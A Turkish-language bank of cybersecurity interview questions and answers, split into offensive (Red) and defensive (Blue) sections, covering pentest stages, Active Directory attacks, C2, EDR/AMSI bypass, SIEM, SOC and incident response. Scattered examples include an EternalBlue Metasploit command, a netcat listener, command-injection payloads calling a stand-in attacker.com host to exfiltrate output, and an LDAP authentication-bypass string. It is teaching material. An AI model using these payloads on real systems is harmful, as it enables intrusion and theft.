SNMP (Simple Network Management Protocol): Ağ cihazlarını (router, switch, printer) izlemek ve yönetmek için kullanılan protokoldür. UDP 161 (sorgu) ve 162 (trap) portlarını kullanır.

Güvenlik Riskleri:
  • SNMPv1/v2c: Community string (parola) plaintext gider — "public/private" varsayılan değerleri çok yaygın
  • Bilgi ifşası: SNMP walk ile tüm ağ topolojisi, cihaz bilgileri, routing tabloları okunabilir
  • Yazma izni: SNMP write erişimi olan saldırgan cihaz konfigürasyonunu değiştirebilir
Çözüm: SNMPv3 kullan (kimlik doğrulama + şifreleme), varsayılan community string'leri değiştir, SNMP trafiğini ACL ile kısıtla.
Community stringSNMPv3UDP 161SNMP walkBilgi ifşası

Red

Penetrasyon testinin aşamaları nelerdir?

1. Reconnaissance: Pasif (OSINT) ve aktif bilgi toplama. WHOIS, Shodan, theHarvester.

2. Scanning & Enumeration: Port tarama, servis versiyonları, zafiyet tarama. Nmap, Nessus.

3. Exploitation: Zafiyetleri istismar etme. Metasploit, özel exploit.

4. Post-Exploitation: Privilege escalation, persistence, lateral movement, veri çalma.

5. Reporting: Teknik + yönetici raporu. Risk derecelendirme (CVSS), remediation önerileri.
ReconEnumerationExploitPost-exploitReport

CVE, CVSS, CWE arasındaki fark nedir?

CVE: Kamuya açık güvenlik açıklarına verilen benzersiz kimlik. Örn: CVE-2021-44228 (Log4Shell)

CVSS: Zafiyetin ciddiyetini 0-10 arası puanlayan sistem.
  • 7.0-8.9: High
  • 9.0-10.0: Critical
CWE: Yazılım/donanım zayıflıklarının kategorize edilmiş listesi. CVE'nin köküdür. Örn: CWE-89 (SQL Injection)
CVE kimlikCVSS skorCWE kategoriLog4Shell

OSINT araçları nelerdir? (Shodan, theHarvester, Maltego)

OSINT (Open Source Intelligence): Kamuya açık kaynaktan bilgi toplama.

Araçlar:
  • Shodan: İnternete açık cihaz arama motoru. Kamera, ICS, router bulunabilir.
  • theHarvester: Email, subdomain, IP toplama (Google, Bing, LinkedIn)
  • Maltego: İlişki grafikleri ile OSINT görselleştirme
  • Recon-ng: Modüler OSINT framework
  • SpiderFoot: Otomatik OSINT
  • crt.sh: SSL sertifikası geçmişi, subdomain bulma
  • Google dorks: site:, filetype:, inurl: operatörleri
ShodantheHarvesterMaltegocrt.shPasif keşif

Metasploit framework nedir ve nasıl kullanılır?

En yaygın kullanılan açık kaynak exploit framework'üdür.

Temel bileşenler:
  • msfconsole: Ana arayüz
  • Exploit: Zafiyeti kullanan kod
  • Payload: Exploit sonrası çalışacak kod (meterpreter, shell)
  • Auxiliary: Tarama, brute force modülleri
Örnek:use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
run
msfconsoleExploitPayloadMeterpreterEternalBlue

Reverse shell ile bind shell farkı nedir?

Bind Shell: Hedef bir port üzerinde dinler, saldırgan bağlanır. Güvenlik duvarı engel olabilir.

Reverse Shell: Hedef, saldırganın makinesine bağlanır. Outbound bağlantı genellikle engellenmez → daha etkili.

Neden reverse tercih edilir: Kurumsal ortamlarda inbound bağlantılar block edilir, outbound 80/443 açıktır.

Araç: nc -lvnp 4444 (listener), Meterpreter reverse_tcp
Reverse shellBind shellOutbound 443NetcatFirewall bypass

Buffer overflow saldırısı nasıl çalışır? Stack vs heap?

Program tampon sınırını aşan veri yazınca komşu bellek bölgelerini bozar.

Stack overflow: Return address üzerine yazarak EIP/RIP kontrolü ele geçirilir → shellcode çalıştırılır.

Heap overflow: Heap metadata veya fonksiyon pointer'larını bozar. Daha karmaşık exploit gerektirir.

Koruma mekanizmaları:
  • ASLR
  • NX/DEP (Non-executable stack)
  • Stack canary
Bypass: ROP chain, heap spray
EIP kontrolüReturn addressASLRNX/DEPStack canaryROP

SQL injection türleri nelerdir? Blind SQLi nasıl çalışır?

In-band SQLi:
  • Error-based: DB hata mesajları veri sızdırır
  • UNION-based: UNION SELECT ile ekstra veri çeker
Blind SQLi:
  • Boolean-based: Koşul doğru/yanlışsa sayfa farklı yanıt verir
  • Time-based: SLEEP(5) ile gecikme ölçerek veri çekilir
Araç: sqlmap
Union-basedError-basedBoolean blindTime-basedsqlmap

XSS (Cross-Site Scripting) türleri: stored, reflected, DOM-based

Reflected XSS: Script URL parametresinde, sunucu yansıtır. Kalıcı değil.

Stored (Persistent) XSS: Script veritabanına kaydedilir. Her yüklenişinde çalışır. Daha tehlikeli.

DOM-based XSS: Client-side JavaScript DOM'u manipüle eder. Sunucu log'unda görünmez.

Etkiler: Session cookie çalma, keylogging, phishing overlay

Önlem: Input validation, output encoding, CSP header
ReflectedStoredDOM-basedCookie theftCSP

Privilege escalation için hangi teknikleri biliyorsunuz? (Linux/Windows)

Linux Privilege Escalation:
  • SUID/GUID binary exploit (find / -perm -4000)
  • Sudo misconfigurations (sudo -l)
  • Cron job yazılabilir script
  • Zayıf dosya izinleri (/etc/passwd writeable)
  • Kernel exploit (dirty cow, overlayfs)
  • PATH hijacking
Windows Privilege Escalation:
  • Unquoted service path
  • Writeable service binary
  • AlwaysInstallElevated (MSI)
  • Token impersonation (SeImpersonatePrivilege)
  • DLL hijacking
  • Juicy Potato, PrintSpoofer
SUIDSudo misconfigToken impersonationJuicy PotatoDLL hijack

Pass-the-Hash nedir? Nasıl kullanılır?

Windows'ta NTLM kimlik doğrulaması, parolanın hash'ini kullanır. Saldırgan asıl parolayı bilmeden hash'i kimlik doğrulama için kullanabilir.

Senaryo:
  1. Bir sistemden Mimikatz ile NTLM hash'i dump et
  2. Hash'i farklı sistemlere karşı kullan
  3. Lateral movement sağla
Araçlar: Mimikatz (sekurlsa::pth), Impacket (psexec.py, wmiexec.py), CrackMapExec

Önlem: Credential Guard, Protected Users grubu, SMB signing, LAPS
NTLM hashMimikatzImpacketCredential GuardLateral movement

Kerberoasting nedir?

Servis hesapları SPN ile tanımlanır. Kerberos TGS bileti, servis hesabı hash'i ile şifrelenir.

Saldırı:
  1. Tüm SPN'leri listele
  2. TGS bileti iste
  3. Bileti offline crack et (Hashcat)
  4. Servis hesabı parolasını elde et
Araçlar: Rubeus (kerberoast), Impacket GetUserSPNs.py
Önlem: AES-256, 100+ karakter güçlü parola
SPNTGSOffline crackRubeusAES-256 önlem

Golden Ticket ve Silver Ticket saldırıları nedir?

Golden Ticket: KRBTGT hash'ini ele geçirince herhangi kullanıcı için sahte TGT oluşturulabilir. Domain'de her yere erişim. Onlarca yıl geçerli olabilir.

Silver Ticket: Hedef servis hash'i ile sahte TGS. Sadece o servise erişim. KDC'ye istek atmaz → daha sessiz.

Fark: Golden = tüm domain, Silver = tek servis
Önlem: KRBTGT hash'i 2 kez sıfırla, Privileged Access Workstations
KRBTGTTGT vs TGSTüm domainSessiz saldırı

Active Directory'de ilk erişimden sonra ne yaparsınız? (Initial Enumeration)

Domain kullanıcısı yetkisiyle yapılabilecek ilk enumeration adımları:

Otomatik:
  • BloodHound + SharpHound: tüm AD nesnelerini topla, attack path analiz et
  • PowerView: domain bilgisi, group üyelikleri, GPO'lar, ACL'lar
Manuel hedefler:
  • Domain admin hesapları kimler?
  • Kerberoastable / ASREP-roastable hesaplar var mı?
  • Unconstrained / constrained delegation olan makine/hesap var mı?
  • LAPS aktif mi?
  • Yazılabilir GPO var mı?
  • Admin-accessible share'ler (net view, SMB)
BloodHoundPowerViewDelegationKerberoastableGPO abuse

Lateral movement için hangi teknikleri kullanırsınız?

  • Pass-the-Hash/Pass-the-Ticket: Hash/ticket ile kimlik doğrulama
  • PsExec / SMBExec: SMB üzerinden uzak komut
  • WMI (wmiexec): Windows Management Instrumentation
  • WinRM / Evil-WinRM: Remote PowerShell
  • DCOM: Distributed COM nesneleri
Araçlar: Impacket, CrackMapExec (CME)
SMBExecWMIWinRMCrackMapExecT1021

Living off the land (LotL) nedir? LOLbins örnekleri?

Hedef sistemde halihazırda var olan OS araçlarını kullanarak operasyon yapma. Yeni araç indirme gerekmez → AV/EDR bypass.

Windows LOLbins:
  • certutil.exe – Dosya indirme, base64 encode
  • mshta.exe – HTA dosyası çalıştırma
  • regsvr32.exe – COM scriptlet
  • rundll32.exe – DLL çalıştırma
  • powershell -EncodedCommand
Referans: lolbas-project.github.io
LOLbinscertutilmshtaBypass AVBuilt-in araçlar

C2 (Command & Control) framework nedir? Cobalt Strike, Sliver vs?

Ele geçirilmiş sistemleri merkezi olarak yönetmek, komut göndermek ve veri çalmak için kullanılan altyapıdır.

Popüler C2 framework'leri:
  • Cobalt Strike: Ticari, en yaygın, beacon payload, malleable C2 profili. Gerçek APT'ler ve red teamlar kullanır.
  • Sliver: Açık kaynak, modern, mTLS/HTTP3/DNS kanalları
  • Havoc: Açık kaynak, Cobalt Strike alternatifi
  • Metasploit (meterpreter): Temel C2 yetenekleri
Tespit önleme: Domain fronting, HTTPS üzerinden gizli kanal, beacon jitter
Cobalt StrikeSliverBeaconMalleable C2Domain fronting

Antivirus / EDR bypass için hangi yöntemler vardır?

Statik bypass: Obfuscation, packing/şifreleme, kod imzalama, LOLbins

Dinamik/davranış bypass:
  • Sleep/sandbox detection (VM check)
  • Parent process spoofing
  • Process injection (meşru process içinde çalış)
  • AMSI bypass (PowerShell için)
  • ETW patching
EDR spesifik: Kernel-level hooks bypass, ntdll unhooking
ObfuscationAMSI bypassETW patchingProcess injectionSandbox detection

File upload zafiyeti nedir? Nasıl exploit edilir?

Uygulama, yüklenen dosyanın türünü/içeriğini yeterince doğrulamazsa saldırgan zararlı dosya yükleyebilir.

Saldırı senaryoları:
  • PHP webshell yükleme (shell.php) → RCE
  • Content-Type kontrolü varsa: Content-Type: image/jpeg ama dosya .php
  • Double extension: shell.php.jpg
  • Null byte: shell.php%00.jpg
  • Polyglot: Hem geçerli resim hem çalışabilir PHP
Önlemler:
  • Whitelist extension + MIME type kontrolü
  • Yüklenen dosyaları web root dışına kaydet
  • Dosyaları execute edilemez dizine koy
  • Content-Disposition header ile sun, doğrudan URL erişimini engelle
WebshellDouble extensionMIME bypassWeb root dışıPolyglot file

ASREP Roasting nedir? Kerberoasting'den farkı?

ASREP Roasting: Kerberos pre-authentication devre dışı bırakılmış hesaplara saldırı. Credential gerekmez; DC, kullanıcı hash'i ile şifreli AS-REP döner → offline crack.

Fark:
  • Kerberoasting: Domain user credential gerekli, SPN hedefler
  • ASREP Roasting: Credential gerekmez, pre-auth disabled hesaplar hedef
Araç: impacket-GetNPUsers.py domain/ -usersfile users.txt
Pre-auth disabledAS-REP hashCredential gerekmezGetNPUsers

Bir hedefin saldırı yüzeyini (attack surface) nasıl belirlersiniz?

Harici saldırı yüzeyi:
  • Shodan/Censys ile internet-facing sistem tespiti
  • Subdomain enumeration (amass, subfinder)
  • WHOIS, ASN sorguları
  • Google dorks
  • SSL sertifika logları (crt.sh)
İçeriden:
  • Ağ taraması (Nmap)
  • Active Directory kullanıcı/grup enumerasyonu
  • SNMP, NetBIOS enumeration
Amaç: Mümkün olduğunca eksiksiz asset envanteri oluşturmak.
ShodanSubdomain enumcrt.shGoogle dorksASN

Ethical hacking kapsamında izin belgesi (ROE) neden kritiktir?

ROE (Rules of Engagement): Sızma testinin sınırlarını, kapsamını ve kurallarını tanımlayan yasal belgedir.

İçermesi gerekenler:
  • Test edilecek sistemlerin IP/domain listesi (scope)
  • Test saatleri ve penceresi
  • Yasaklı aktiviteler (DoS, sosyal mühendislik limiti vb.)
  • İletişim ve eskalasyon prosedürü
  • Veri işleme gizliliği
Neden kritik: Kapsam dışına çıkmak yasal suç oluşturur. Türkiye'de TCK 243-245, ABD'de CFAA kapsamında yargılanma riski vardır.
ScopeYasal korumaTCK 243CFAAYazılı izin

Phishing email oluşturmak için hangi araçları kullanırsınız?

Framework'ler:
  • GoPhish: Açık kaynak phishing simülasyon platformu. Kampanya yönetimi, istatistik takibi.
  • Social Engineering Toolkit (SET): Metasploit tabanlı, kapsamlı SE araç seti
  • Evilginx: Reverse proxy tabanlı, MFA bypass edebilen phishing framework
Dikkat edilecekler:
  • Domain squatting (homoglyph, typosquatting)
  • Email spoofing → SPF, DKIM, DMARC kontrolü
  • Lookalike certificate (Let's Encrypt)
Etik not: Yalnızca yetkili red team operasyonlarında kullanılır.
GoPhishSETEvilginxSPF/DKIM/DMARCMFA bypass

Command injection nedir? Out-of-band nasıl kullanılır?

Uygulama, kullanıcı girdisini OS komutu olarak çalıştırdığında komutlara ek komut enjekte etme.

Payload örnekleri:
; whoami
| id
&& cat /etc/passwd
`id`

Blind command injection: Çıktı görünmüyor. Out-of-band tespit:
  • Time-based: ; sleep 5
  • DNS/HTTP: ; nslookup attacker.com veya ; curl http://attacker.com/$(whoami)
Önlem: OS komutu çalıştırmaktan kaçın; kaçınılamıyorsa whitelist + escaping (shell_exec yerine execve gibi array argüman).
OS commandBlind injectionOut-of-bandsleep 5Shell metacharacter

LDAP injection nedir?

Uygulama kullanıcı girdisini LDAP sorgusu içine gömdüğünde oluşan injection türü.

Örnek zafiyet: Login: (&(uid=KULLANICI)(password=PAROLA))

Payload: Kullanıcı adı olarak *)(uid=*))%00 girilirse sorgu bozulur, her kullanıcı eşleşir → authentication bypass.

Blind LDAP injection: Boolean tabanlı, attribute değerlerini tek tek çekmek mümkün.

Önlem: LDAP escape fonksiyonları kullan (PHP: ldap_escape()), parameterized LDAP kütüphanesi, input validation.
Authentication bypassLDAP filterldap_escapeBoolean blindDirectory service

Token impersonation nedir? Windows'ta nasıl çalışır?

Windows'ta her process bir access token taşır. Bu token, hangi kullanıcı kimliğiyle çalıştığını belirler.

SeImpersonatePrivilege veya SeAssignPrimaryTokenPrivilege varsa: Saldırgan başka kullanıcıların tokenlarını "impersonate" edebilir → privilege escalation.

Araçlar:
  • Juicy Potato / Sweet Potato: Service account → SYSTEM (Windows 10 öncesi)
  • PrintSpoofer: SeImpersonatePrivilege → SYSTEM
  • RoguePotato: Modern Windows versiyonlarında çalışır
Tespit: Event 4624 logon type 3 veya 9, şüpheli parent-child process ilişkisi.
SeImpersonatePrivilegePrintSpooferJuicy PotatoSYSTEMToken theft

AMSI bypass nedir ve neden önemlidir?

AMSI (Antimalware Scan Interface): Windows'ta PowerShell, VBScript, JScript gibi script motorlarını çalıştırılmadan önce AV motorlarına tarayan interface.

Neden önemli: PowerShell tabanlı araçlar (Empire, PowerSploit) AMSI tarafından engellenir. Bypass olmadan script çalıştırılamaz.

Bypass yöntemleri:
  • AMSI DLL memory patching (amsi.dll içindeki AmsiScanBuffer fonksiyonunu patch etmek)
  • Obfuscation: A`msi`Utils gibi parçalama
  • Reflection tabanlı AMSI disable etme
  • Downgrade attack: PowerShell v2 (AMSI yok)
AmsiScanBuffer patchPowerShell v2 downgradeObfuscationScript scanningReflection

Lateral movement nedir? Hangi teknikler kullanılır?

Saldırganın ilk erişim noktasından ağ içinde yatay olarak yayılarak diğer sistemlere sızma sürecidir.

Yaygın teknikler:
  • Pass the Hash (PtH): NTLM hash'i ele geçirerek başka sistemlerde kimlik doğrulama
  • Pass the Ticket: Kerberos ticket'ı çalarak farklı servislere erişim
  • Remote Services: RDP, SMB, SSH, WinRM üzerinden erişim
  • Living off the Land (LotL): PowerShell, WMI gibi meşru araçları kullanma
  • Token Impersonation: Yüksek yetkili kullanıcının token'ını taklit etme
MITRE ATT&CK: Lateral Movement (TA0008) taktiği altında 9+ teknik bulunur.
Pass the HashKerberosLotLWMIMITRE TA0008

Kerberoasting nedir?

Active Directory ortamında, Kerberos servis biletlerini (TGS) offline olarak kırmayı hedefleyen saldırı tekniğidir.

Nasıl çalışır:
  1. Domain kullanıcısı herhangi bir SPN (Service Principal Name) kaydına sahip servis için TGS bileti ister
  2. Bu bilet servisin NTLM hash'i ile şifrelenmiş olarak gelir
  3. Saldırgan bileti alır ve offline brute force ile servis hesabının şifresini kırmaya çalışır
Neden tehlikeli: Domain kullanıcısı yetkisi yeterli, admin gerekmez. Servis hesapları genelde zayıf/değiştirilmeyen şifre kullanır.

Savunma: Güçlü servis hesabı şifreleri, Managed Service Accounts (MSA), AES şifreleme zorunluluğu.
SPNTGSOffline crackingActive DirectoryMSA

OSINT nedir? Pentest'te nasıl kullanılır?

OSINT (Open Source Intelligence): Kamuya açık kaynaklardan hedef hakkında istihbarat toplama sürecidir. Pentest'in reconnaissance (keşif) aşamasının temelini oluşturur.

OSINT Kaynakları:
  • Shodan/Censys: İnternete açık cihaz ve servis keşfi
  • Google Dorks: site:target.com filetype:pdf gibi gelişmiş aramalar
  • theHarvester: Email, subdomain, çalışan adları toplama
  • LinkedIn: Çalışan listesi, teknoloji stack, organizasyon yapısı
  • WHOIS/DNS: Domain bilgileri, IP blokları
  • Wayback Machine: Eski site sürümleri, eski kodlar
  • Pastebin/GitHub: Sızdırılmış kimlik bilgileri, hardcoded secret
ShodanGoogle DorkstheHarvesterReconnaissancePassive recon

Pass the Hash saldırısı nedir ve nasıl önlenir?

Windows kimlik doğrulamasında, saldırganın kullanıcının şifresini bilmeden NTLM hash'ini kullanarak kimlik doğrulaması yapmasıdır.

Nasıl çalışır:
  1. Saldırgan bir sistemde admin yetkisi elde eder
  2. Mimikatz gibi araçla bellekten NTLM hash'leri döker
  3. Hash'i başka sistemlere karşı kullanır — şifre kırmaya gerek yok
Neden mümkün: Windows, kimlik doğrulamada hash'i düz şifre yerine kullanabilir (NTLM protokolü tasarımı).

Savunma:
  • Credential Guard (virtualization-based security)
  • Local admin şifrelerini LAPS ile yönet
  • SMB imzalama zorunlu hale getir
  • Privileged Access Workstation (PAW)
NTLM hashMimikatzCredential GuardLAPSLateral movement

Privilege escalation türleri nelerdir?

Düşük yetkili bir hesaptan daha yüksek yetkiye (admin/root) yükselme tekniklerinin bütünüdür.

Dikey (Vertical) Escalation: Normal kullanıcı → Admin/Root
  • Kernel exploits (CVE bazlı)
  • SUID/SUDO yanlış yapılandırma (Linux)
  • Unquoted service paths (Windows)
  • DLL hijacking (Windows)
  • Cron job / Scheduled task abuse
Yatay (Horizontal) Escalation: Kullanıcı A → Kullanıcı B (aynı seviye ama farklı veri erişimi)

Araçlar: WinPEAS, LinPEAS, PowerUp, BeRoot
Kaynaklar: GTFOBins (Linux), LOLBAS (Windows)
SUIDDLL hijackingKernel exploitWinPEAS/LinPEASGTFOBins

C2 (Command & Control) nedir? Nasıl çalışır?

C2 (C&C — Command & Control): Saldırganın ele geçirdiği sistemleri uzaktan kontrol ettiği altyapıdır.

Çalışma mantığı:
  1. Hedef sistemde implant/RAT (Remote Access Trojan) çalıştırılır
  2. İmplant, C2 sunucusuna dönemsel olarak "check-in" yapar (beacon)
  3. Saldırgan komut gönderir, implant çalıştırır, sonucu geri döndürür
Tespitten kaçınma teknikleri:
  • Domain Fronting: CDN (Cloudflare, AWS) üzerinden trafik yönlendirme
  • DNS C2: Komutları DNS sorgularına gizleme
  • HTTPS beacon: Meşru trafiğe karıştırma
Araçlar: Cobalt Strike, Metasploit, Sliver, Havoc
BeaconRATDomain frontingDNS C2Cobalt Strike

Blue

SIEM nedir? Hangi ürünleri biliyorsunuz?

SIEM (Security Information and Event Management): Farklı kaynaklardan log toplayan, normalleştiren, korelasyon kuralları çalıştıran ve alert üreten merkezi güvenlik platformu.

Ürünler:
  • Splunk: En yaygın enterprise çözüm
  • Microsoft Sentinel: Cloud-native, Azure
  • IBM QRadar
  • Elastic SIEM (ELK Stack)
  • Wazuh: Açık kaynak
Log korelasyonAlertSplunkSentinelWazuh

SOC tier'ları (L1/L2/L3) ne anlama gelir?

L1 — Analyst: Alertleri triaj eder, false positive elendirir, standart playbook uygular. 7/24 çalışır.

L2 — Senior Analyst: Karmaşık olayları analiz eder. Incident yönetimi, derin log analizi, malware incelemesi.

L3 — Expert / Threat Hunter: Proaktif tehdit avı, sıfır gün analizi, SIEM kural geliştirme, threat intel entegrasyonu.
L1 triajL2 analizL3 huntEskalasyonCSIRT

EDR ve antivirus farkı nedir?

Antivirus: İmza tabanlı. Bilinen malware'i tanır. Kolay bypass edilir.

EDR:
  • Süreç yaratma, ağ bağlantıları, registry değişiklikleri gibi davranışları izler
  • ML ve behavioral analytics kullanır
  • Telemetri toplar, merkezi görünürlük
  • Otomatik izolasyon, response aksiyonları
Ürünler: CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne
İmza vs davranışTelemetriCrowdStrikeOtomatik response

SOAR nedir?

SOAR (Security Orchestration, Automation and Response): Güvenlik iş akışlarını otomatikleştiren ve farklı araçları entegre eden platform.

Katkıları:
  • L1 görevleri otomatize eder (phishing analizi, IP reputation sorgusu)
  • MTTD/MTTR önemli ölçüde düşer
  • Playbook standardizasyonu
  • Araç entegrasyonu (SIEM, ticketing, firewall, threat intel)
Ürünler: Palo Alto XSOAR, Splunk SOAR
Playbook otomasyonuMTTD/MTTRXSOAROrkestrasyon

IoC ve IoA farkı nedir?

IoC (Indicator of Compromise): İhlalin gerçekleştiğine dair kanıt. Reaktif.
  • Kötü amaçlı IP/domain/hash
  • Registry key, mutex, C2 adresi
IoA (Indicator of Attack): Saldırının devam ettiğine dair davranış kalıpları. Daha proaktif.
  • "Admin hesabı gece 2'de 50 başarısız login yaptı"
  • "lsass.exe memory dump edildi"
IoA daha değerlidir — daha erken yakalamayı sağlar.
Reaktif vs proaktifHash IP domainDavranış kalıbıErken tespit

MITRE ATT&CK framework nedir ve nasıl kullanılır?

Gerçek dünya saldırılarına dayalı, saldırgan taktik ve tekniklerini kataloglayan bilgi tabanı.

Yapısı: 14 Taktik → Teknikler → Alt teknikler
Reconnaissance → Initial Access → Execution → Persistence → ... → Exfiltration → Impact

SOC kullanımı:
  • Tespit boşluklarını (coverage gaps) belirleme
  • Adversary emulation planı
  • SIEM kural yazımında referans
Araç: ATT&CK Navigator
14 taktikCoverage gapAdversary emulationATT&CK Navigator

Windows Event Log'larında hangi event ID'ler kritiktir?

Authentication:
  • 4624 Başarılı login (logon type önemli)
  • 4625 Başarısız login
  • 4648 Explicit credentials ile login
  • 4672 Ayrıcalıklı hesap ile login
Hesap/Grup:
  • 4720 Yeni hesap oluşturma
  • 4728/4732 Güvenlik grubuna üye ekleme
Process:
  • 4688 Process oluşturma
  • 4698 Zamanlanmış görev oluşturma
Kerberos:
  • 4769 TGS isteği (Kerberoasting)
46244625468847204769 Kerberoasting

Sysmon nedir ve nasıl yapılandırılır?

Microsoft'un ücretsiz sistem izleme aracı. Windows Event Log olmayan detaylı telemetri sağlar.

Kritik eventler:
  • Event 1: Process Create (komut satırı dahil)
  • Event 3: Network Connection
  • Event 7: Image Load (DLL load)
  • Event 8: CreateRemoteThread (injection tespiti)
  • Event 10: ProcessAccess (LSASS dump tespiti)
  • Event 13: Registry Value Set
Config: SwiftOnSecurity veya olaf hartong sysmon-config önerilir.
Event 1Event 10 LSASSEvent 8 injectionSwiftOnSecurity config

Incident response aşamaları nelerdir? (PICERL)

P — Preparation: Playbook, araç kurulumu, eğitim
I — Identification: Tespit, initial triaj, scope
C — Containment: Yayılmayı durdurma (kısa vadeli: izolasyon, uzun vadeli: kalıcı düzeltme)
E — Eradication: Kök nedeni ortadan kaldırma, persistence temizleme
R — Recovery: Sistemleri üretime geri alma, monitörleme
L — Lessons Learned: Post-mortem, belgeleme, kural iyileştirme
PICERLNIST 800-61ContainmentEradicationPost-mortem

Bir ransomware saldırısını tespit ettinizde ilk adımlarınız neler?

İlk 15 dakika:
  1. Etkilenen sistemi ağdan izole et
  2. Tüm kimlik bilgilerini geçersiz kıl
  3. Backup sistemlerinin temiz olduğunu doğrula
  4. Karar vericileri ve hukuk ekibini bilgilendir
Analiz:
  • Ransomware ailesini tanımla (ID Ransomware)
  • Initial access vektörünü belirle
  • Lateral movement kapsamını değerlendir
Recovery: Yedekten restore, patch, döndür.
İzolasyon önceBackup doğrulaInitial accessID Ransomware

Digital forensics'te volatility sırası (order of volatility) nedir?

Kanıt toplama sırasında en geçici veriden en kalıcı veriye gitme prensibi (RFC 3227):

  1. CPU register'ları, cache
  2. RAM (kapanınca gider)
  3. Ağ bağlantısı durumu, ARP tablosu
  4. Çalışan process'ler
  5. Geçici dosyalar, swap/pagefile
  6. Disk
  7. Remote logging / SIEM
Önce RAM dump al, sonra disk imajı!
RAM önceRFC 3227CPU registerOrder of volatility

Honeypot ve honeytoken nedir? Ne zaman kullanılır?

Honeypot: Saldırganları çekmek için kasıtlı olarak zayıf bırakılmış sahte sistem. Saldırgan aktivitesini inceleme ve erken uyarı amaçlı.

Türleri:
  • Low-interaction: Sahte servis simüle eder (Honeyd)
  • High-interaction: Gerçek OS, izleme altında (Cowrie SSH honeypot)
Honeytoken: Gerçekmiş gibi görünen sahte veri/kimlik bilgisi.
  • Sahte AWS credentials (GitGuardian benzeri ile izlenir)
  • Sahte DB kaydı (honeypot email adresi)
  • canarytoken.org ile izleme
Değer: False positive neredeyse sıfır — honeypot/honeytokena erişim kesinlikle şüphelidir.
CowrieHigh/low interactionCanarytokenFalse positive yokSahte credential

Alert fatigue nedir ve nasıl yönetilir?

SOC analistlerinin aşırı alert ile bunalıp önemli olanları kaçırması.

Çözümler:
  • Risk-based alerting: Her alert skorlanır, düşük skor otomatik kapanır
  • SOAR ile L1 görevlerin otomasyonu
  • Düzenli rule review (alert tuning)
  • Enrichment: IP reputation, asset bilgisi otomatik eklenir
  • Use case bazlı kural yazımı (MITRE tabanlı)
False positiveRisk-based scoringSOARDwell timeKural tuning

SIEM nedir ve nasıl kullanılır? Hangi ürünleri biliyorsunuz?

SIEM (Security Information and Event Management): Farklı kaynaklardan log toplayan, normalleştiren, korelasyon kuralları çalıştıran ve alert üreten merkezi güvenlik platformu.

Temel fonksiyonlar: Log toplama, normalleştirme, korelasyon, alert, dashboard, forensics arama

Ürünler:
  • Splunk: En yaygın enterprise çözüm
  • Microsoft Sentinel: Cloud-native, Azure entegrasyonu
  • IBM QRadar
  • Elastic SIEM (ELK Stack)
  • Wazuh: Açık kaynak
Log korelasyonAlertSplunkSentinelWazuh

False positive'i nasıl azaltırsınız?

Teknik yaklaşımlar:
  • Kural eşiğini artırma (threshold tuning)
  • Whitelist / exclusion listesi oluşturma (onaylı uygulamalar, IP'ler)
  • Korelasyon kurallarına ek koşul ekleme (AND mantığı)
  • Baseline oluşturma ve anomali eşiğini normale göre ayarlama
Süreç yaklaşımları:
  • Düzenli rule review
  • Use case kütüphanesi (MITRE tabanlı)
  • Alert fatigue takibi
  • ML tabanlı scoring (risk-based alerting)
Threshold tuningWhitelistBaselineRule reviewRisk-based alert

SOAR nedir? Otomasyonun SOC'a katkısı nedir?

SOAR (Security Orchestration, Automation and Response): Güvenlik iş akışlarını otomatikleştiren ve farklı araçları entegre eden platform.

Katkıları:
  • Tekrarlayan L1 görevlerini otomatize eder (phishing email analizi, IP reputation sorgusu)
  • MTTD/MTTR (tespit ve yanıt süreleri) önemli ölçüde düşer
  • Playbook standardizasyonu
  • Araç entegrasyonu (SIEM, ticketing, firewall, threat intel)
Ürünler: Palo Alto XSOAR, Splunk SOAR, IBM Resilient

Önemli not: SOAR insanın yerini almaz, yüksek-hacimli görevleri üstlenir.
Playbook otomasyonuMTTD/MTTRXSOAROrkestrasyonAlert triaj

IoC (Indicator of Compromise) ve IoA (Indicator of Attack) farkı?

IoC: Bir ihlalin gerçekleştiğine dair kanıt. Reaktif, post-compromise.
  • Kötü amaçlı IP/domain/hash
  • Registry key, mutex adı
  • C2 IP adresi
IoA: Saldırının devam ettiğine dair davranış kalıpları. Daha proaktif.
  • "Admin hesabı gece 2'de 50 başarısız login yaptı"
  • "powershell -enc çalıştırıldı"
  • "lsass.exe memory dump edildi"
Fark özeti: IoC ≈ "saldırı oldu" kanıtı, IoA ≈ "saldırı oluyor" sinyali. IoA daha değerlidir çünkü daha erken yakalamayı sağlar.
Reaktif vs proaktifHash IP domainDavranış kalıbıErken tespit

Bir sistemin ele geçirildiğini nasıl anlarsınız? (signs of compromise)

Ağ seviyesi:
  • Alışılmadık outbound bağlantılar (özellikle gece)
  • Beklenmedik DNS sorguları veya DGA benzeri domainler
  • Yüksek veri transferi (exfiltration)
Host seviyesi:
  • Alışılmadık süreç oluşturma (cmd.exe → suspicious child)
  • Yeni zamanlanmış görev veya servis
  • LSASS erişimi
  • Beklenmedik yeni hesap oluşturma
  • Dosya şifreleme aktivitesi (ransomware)
Log seviyesi:
  • Event 4624 (başarılı login) alışılmadık saatten
  • Event 4688 (süreç oluşturma) şüpheli komutlarla
Outbound trafikDGALSASS erişimiYeni hesapEvent 4688

Network baseline nedir ve anormalliği nasıl tespit edersiniz?

Baseline: Ağın normal davranış profili. Belirli bir zaman aralığında trafiğin hacmi, protokol dağılımı, bant genişliği kullanımı, aktif bağlantı sayısı gibi metrikler baseline oluşturur.

Anomali tespit yöntemleri:
  • Statistiksel: ortalamadan ±N standart sapma
  • ML tabanlı: unsupervised clustering, isolation forest
  • Kural tabanlı: "bu sunucudan hiç SMB çıkmamalı"
  • Peer comparison: aynı segmentteki diğer cihazlarla karşılaştırma
Araçlar: Zeek (Bro), NetFlow analizi, Darktrace
Normal profilStandart sapmaZeekNetFlowML anomaly

Threat hunting nedir? Hangi yaklaşımla başlarsınız?

Alertleri beklemeden, proaktif olarak sistemlerde gizlenmiş tehditleri aramaktır.

Başlangıç yaklaşımları:
  • Hipotez tabanlı: "Ortamımızda Kerberoasting yapılıyor olabilir mi?" → TGS isteklerini incele
  • Intel tabanlı: Threat intel'den gelen IoC/TTP'yi ortamda ara
  • Anomaly tabanlı: Baseline dışı davranışları araştır
Döngü: Hipotez → Veri toplama → Analiz → Tespit/İptal → Playbook güncelleme

Araçlar: Elastic/Splunk, Velociraptor, OSquery
ProaktifHipotezTTPVelociraptorOSquery

Log analizi yaparken nelere dikkat edersiniz?

Temel prensipler:
  • Zaman senkronizasyonu kritiktir (NTP) — farklı sistemlerin logları eşleşmeli
